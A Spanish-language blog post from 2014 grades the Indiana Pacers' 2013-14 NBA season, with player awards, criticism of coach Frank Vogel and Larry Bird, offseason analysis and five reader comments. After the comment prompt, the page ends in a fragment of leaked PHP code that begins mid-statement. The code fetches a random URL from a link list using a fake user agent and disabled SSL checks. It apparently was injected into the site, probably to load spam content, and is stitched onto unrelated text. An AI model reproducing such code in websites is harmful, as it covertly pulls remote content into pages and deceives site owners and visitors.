Indiana Pacers: Aprobado

15 de July de 2014 por Esteban

Todos los aficionados de los Pacers nos sentimos decepcionados con lo que pudo ser y no fue, es cierto, pero la temporada hay que analizarla lo más objetivamente posible.

En nuestro análisis previo les dábamos 60 victorias y una final de conferencia en la que caerían 4-3 frente al Heat. Finalmente fueron 56 victorias (aunque en algún momento de la temporada parecía que íbamos a quedarnos cortos) y la derrota frente a Heat fue 4-2. Es decir que rozaron lo que se esperaba y si en algún momento las expectativas estuvieron demasiado altas fue gracias a sus propios esfuerzos, que superaron lo que la mayoría esperaba de ellos. No podemos culparlos, sino felicitarlos por lograr que muchos les vieran con posibilidades de ganar no solo a Heat sino incluso la NBA.

En el mismo análisis apostábamos a que el equipo mejoraría ayudado por la experiencia ganada en unos playoffs que fueron como la guerra misma y por una mejora notoria de su banca. Sin embargo éramos escépticos respecto sus posibilidades reales de ser una verdadera potencia. La falta de un anotador nato que cargara con la ofensiva era notoria y las probabilidades de atascos ofensivos como los ya vistos en los últimos dos playoffs seguía latente. Ambos inconvenientes se vieron sorteados en los primeros dos meses de competición gracias a un enorme Paul George, que continuó con la inercia de las finales de conferencia de 2013 y emergió como anotador nato y un talento propio de las quinielas para el MVP. Cimentados en su excelente defensa (impresionante por tramos) y bancados en ataque por George, comandaron la liga los primeros meses, lideraron el Este de manera clara y se convirtieron en el mejor equipo de la NBA. 

Pero la dulce primavera duró hasta el All Star: Frank Vogel dirigiendo al equipo del Este, Paul George como titular, Roy Hibbert escogido entre los 12, Lance Stephenson enojado por no ser seleccionado, etc. Después todo se derrumbó.

Desde enero de 2014 el equipo venía dando tumbos pero gracias al hecho de que se enfrentaba a rivales de poca monta lograba sacar adelante los partidos aunque sin lucir y de manera muy ajustada. Más adelante ya no podrían hacerlo ni contra los peores de la liga. Llegaron con lo justo a la costa, suplicando que terminara la temporada regular. Al ritmo que llevaban, si la misma dura dos meses más, no solo perdían el primer puesto en la clasificación sino que eran capaces de haberse quedado fuera de los playoffs.

Muchos no entienden qué pasó en el medio de la temporada. Algunos lo achacan a los fichajes pero me resulta absurdo. Es cierto que Evan Turner prácticamente no aportó nada al equipo pero aún menos aportaba un lesionado y en bajísimo estado de forma (comprobado en los Clippers) Danny Granger, y la llegada de Andrew Bynum, que apenas jugó un puñado partidos con los Pacers, no pudo suponer una amenaza para Hibbert.

Las explicaciones son más sencillas según mi punto de vista. Como se sabía, al equipo no le sobraba nada en ataque, esta debilidad la disimulaba un Paul George que anotaba 24 puntos por partido, una verdadera locura. Su espectacular nivel ofensivo mejoró a sus compañeros en ataque y todo fluyó, pero en cuanto volvió a la normalidad, los problemas ofensivos arreciaron, los resultados cambiaron y comenzaron las dudas. A pesar de ser ya incapaces, George y sus compañeros siguieron empecinados en que podían resolver los partidos jugando de la misma manera y los golpes fueron terribles. Se desmoronó el sentimiento de equipo y creció la desconfianza entre jugadores y entrenador e incluso se puso en duda el trabajo de Larry Bird.

Tocar el cielo y caer al piso de semejante hondazo no es fácil para nadie y resulta muy difícil recuperarse. Aún así, lograron ser primeros en el Este, nada poco pero en los PO sudaron horrores para eliminar a Atlanta, que los tuvo contra las cuerdas en un quinto juego a cara o cruz en la ciudad de la Cola Cola, pero sortearon ese obstáculo y lograron pasar de ronda. La segunda no pudo arrancar peor: los Wizards les derrotaron en su propia casa con relativa facilidad. A estas alturas la temporada ya se había convertido en un suplicio para sus hinchas. Pero de modo increíble se repusieron mostrando una mejorada imagen (sobre todo Hibbert) para llegar a su lugar natural, la final de conferencia. La ropa estaba salvada, se cumplía con el objetivo mínimo y mientras no fuera barrida, se salvaba de forma digna el año. Un gran juego 1 para iniciar la serie  ilusionó a la hinchada pero rápidamente quedó en claro que el equipo no estaba a la altura del Heat y que la temporada era demasiado larga para ellos.

En definitiva, cumplieron con lo mínimo que se les pedía (que no era poco), no avanzaron y quizá hasta puede parecer que retrocedieron pero suman dos temporadas consecutivas en final de conferencia y cuatro años seguidos en PO. No todas las franquicias logran eso (¿No, NYK?).

PREMIOS

MVP: No puede haber otro que Paul George (21.7p – 6.8r – 3.5a – 1.9r), candidato por momentos al MVP de la temporada regular. Se ha afianzado como uno de los mejores aleros de la liga. Es un excelente defensor y reboteador pero es un tirador de rachas (puede jugar contra el Heat e irse a los 36 puntos o quedarse en 10 con pésimos porcentajes). Arrancó la temporada en un estado de forma increíble que lo ponía a la altura de los mejores. Con el tiempo fue bajando sus prestaciones quedando relegado a jugador de segundo orden, al que pertenece a día de hoy. De todas maneras, no se dislumbra su techo y con ese tamaño y agilidad podemos soñar que termine por convertirse en un Tracy McGrady. Este año hubo momentos en que lo pareció…

Sorpresa: Es feo decirlo pero casi no ha habido sorpresas positivas este año. Podemos nombrar a Lance Stephenson (13.8p – 7.2r – 4.6a) quien ha jugado parte del curso a un enorme nivel que se ve ensuciado por sus pésimas actitudes.

Decepción: Me voy a explayar.

Sus cinco titulares que tan buenas sensaciones dejaron los primeros meses dieron un enorme paso atrás en la segunda parte del curso. Stephenson ha jugado una liga que ni el se la cree (y eso que tiene un ego alto) pero sus pésimas actitudes, una cabeza que recuerda al peor Ron Artest y la falta de un tiro de tres puntos mínimamente confiable para un escolta no le deja muy bien parado de cara a la agencia libre. David West pareció algo menos interesado este año tras firmar su suculento contrato. Bajó sus números en todos los casilleros y en PO no fue el líder de antaño. George Hill parecía preparado para despegar pero su flojísima temporada convierte su contrato en una gran carga. Roy Hibbert… ¿qué diablos te pasó? De defensor del año en la NBA a ser uno de los peores jugadores de la liga. Motivación, actitud, ánimo o lo que sea, terminó el año retrocediendo varios de los escalones subidos subido durante las últimas temporadas.

Esperábamos también mucho más de la banca. CJ Watson cumplió y mejoró a Augustine pero no fue determinante como tampoco lo fue Luis Scola, quien a excepción de algunos encuentros puntuales en PO jugó su peor año desde que llegó a la liga, no encontró su lugar en el equipo y nunca pudo ser una solución. Qué decir de Danny Granger que se marcha por la puerta de atrás y casi como un ex jugador, o de Chris Copeland, que apenas ha contado para el técnico. Ian Mahinmi sigue en su tónica de aportar lo justo y necesario pero sigue sin ser suficiente para justificar ese contratazo.

Evan Turner, todo un número 2 del draft, llegó a mitad de temporada para aportar aliento a un banquillo decaído. Algo salió mal pues se ha visto al peor Turner de su carrera: en mala forma, falto de ritmo, lento, mal tirador, mal defensor, mal pasador… De hecho, dejó de entrar en la rotación del equipo en la serie frente al Heat, prefiriendo Frank Vogle incluir a Rasual Butler. Poco resta por decir.

Este tampoco ha sido el año de Larry Bird. Los fichajes no tuvieron que ver con la caída del equipo pero buscando un chivo expiatorio la prensa ha comentado que el fichaje de Bynum cayó muy mal en el vestuario, casi tanto como la salida de Granger. No creo que esa haya sido la razón pero en todo caso, la imagen de Bird queda muy tocada.

Y por último Frank Vogel, el creador de la bestia. Parece que fue ayer cuando O´Brien dejo el puesto de entrenador y Vogel ocupo su lugar. Para ese entonces los Pacers salían a la cancha con TJ Ford, Mike Dunleavy, Danny Granger, Josh McRoberts y Roy Hibbert. Vogel incluyó en la rotación a los jóvenes Collison, George y Hansbrough, enderezó el rumbo y metió al equipo en PO ese mismo año. Lo cierto es que Vogel se ha visto hartamente beneficiado por el poco cartel de sus jugadores, siempre tíos con poco augurios de estrella. Así rescató del ostracismo a Stephenson y le dio las riendas del equipo a George, ayudados ambos por un profesional de perfil bajo como David West. Cuando todos estos jugadores se volvieron “estrellas” ya no fue tan fácil lidiar con ellos. Algo se quebró y habrá que ver si tiene arreglo. Vogel se ha visto incapaz de crear variantes cuando sus jugadores empezaron a perder un partido tras otro. No mostró muñeca ni un as bajo la manga y así es difícil. Podemos criticarle también lo mal utilizado que estuvo Scola todo el curso, donde no tuvo ni una mísera  jugada de pick and roll para él, desluciendo su trabajo y transformando a un jugador de clase en materia ofensiva en un obrero. Se puede criticar la nula participación que le dio también a Coopeland cuando su equipo necesitaba de forma desesperada tiros o el manejo que tuvo de Stephenson, el cual parece que no respeta a nadie. El aura de éxitos que rodeaba a Vogel desapareció este año.

 JUGANDO A GM

Desde el punto de vista de las necesidades los Pacers deberían estar muy activos en este mercado pero su capacidad de movimiento es igual a 0.

El gran tema es Lance Stephenson, quien terminó contrato y tras cobrar monedas sus primeros años querrá mucha pasta. Los Pacers le ofrecieron 44 millones en 5 años pero al escolta le faltó tiempo para rechazar la propuesta. Yo lo renovaría si su precio ronda los 6 o 7 millones de dólares por temporada, que creo puede ser su verdadero valor sumando lo que aporta y sacando lo que resta. Una pena, pero esa cabecita asusta. De momento, por si se quedan sin “Born Ready” los Pacers ya se han hecho con CJ Miles y Damjan Rudez, proveniente del CAI Zaragoza. Otra decisión importante ha sido la de no extender la Qualifying Offer a Evan Turner, lo que le ha convertido en agente libre. Los Pacers no tienen ninguna intención de firmarlo y se rumorea que podrían traspasar a Roy Hibbert a los Suns a cambio de Goran Dragic.

No hay margen para más movimientos a menos que alguien compre los contratos de Mahinmi, Scola o Copeland, los 3 demasiados altos para el rendimiento mostrado, así que tiene toda la pinta de que el próximo año serán prácticamente los mismos jugadores que en este.

Comenta

5 comentarios a esta entrada

  1. Denise dice:
    #1

    El global de la temporada vale que sea de aprobado, pero los Playoffs para mí son de suspenso, con jugadores rindiendo a menos del 50% de su nivel y metidos en peleas, orgias, y broncas..

      Citar

  2. rumbero dice:
    #2

    Denise:
    El global de la temporada vale que sea de aprobado, pero los Playoffs para mí son de suspenso, con jugadores rindiendo a menos del 50% de su nivel y metidos en peleas, orgias, y broncas..

    Agree. Unos de esos casos en el deporte que piensas ¿Pero que co***** os ha pasado? De ser candidatos nº1 al anillo en diciembre a dar una imagen bastante pobre en PO. Como dice Esteban, sufrieron mucho en todas las series, sobreviviendo gracias a George, alguna que otra buena actuación del resto y una aceptable defensa (que sabiendo el nivel que pueden llegar a tener en este sentido sabe a poco). Muy señalados desde mi punto de vista Hill y Hibbert que se marcaron unos PO bastante nefastos. A ver como se mueven y que pasa con Stephenson, aunque no pinta muy bien. De no poder podrían ir a pescar en casa de los Suns con Dragic y Bledsoe. Les falta anotación como el comer

      Citar

  3. TheDeerHunter dice:
    #3

    Nadie lo ha comentado pero Paul George se ha roto de manera extremadamente grave (rollo Shaun Livingston)
    Esperemos que no sea tanto y que se recupere cuanto antes. Lo de menos es que se pierda todo el curso que viene…y por supuesto el mundobasket.
    http://espn.go.com/olympics/basketball/story/_/id/11298573/paul-george-suffers-apparent-serious-leg-injury-team-usa-showcase-game

      Citar

  4. rumbero dice:
    #4

    Terrible. Ni he acabado de ver el video. Esperemos que se pueda recuperar bien

      Citar

  5. Esteban dice:
    #5

    es para largarse a llorar

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>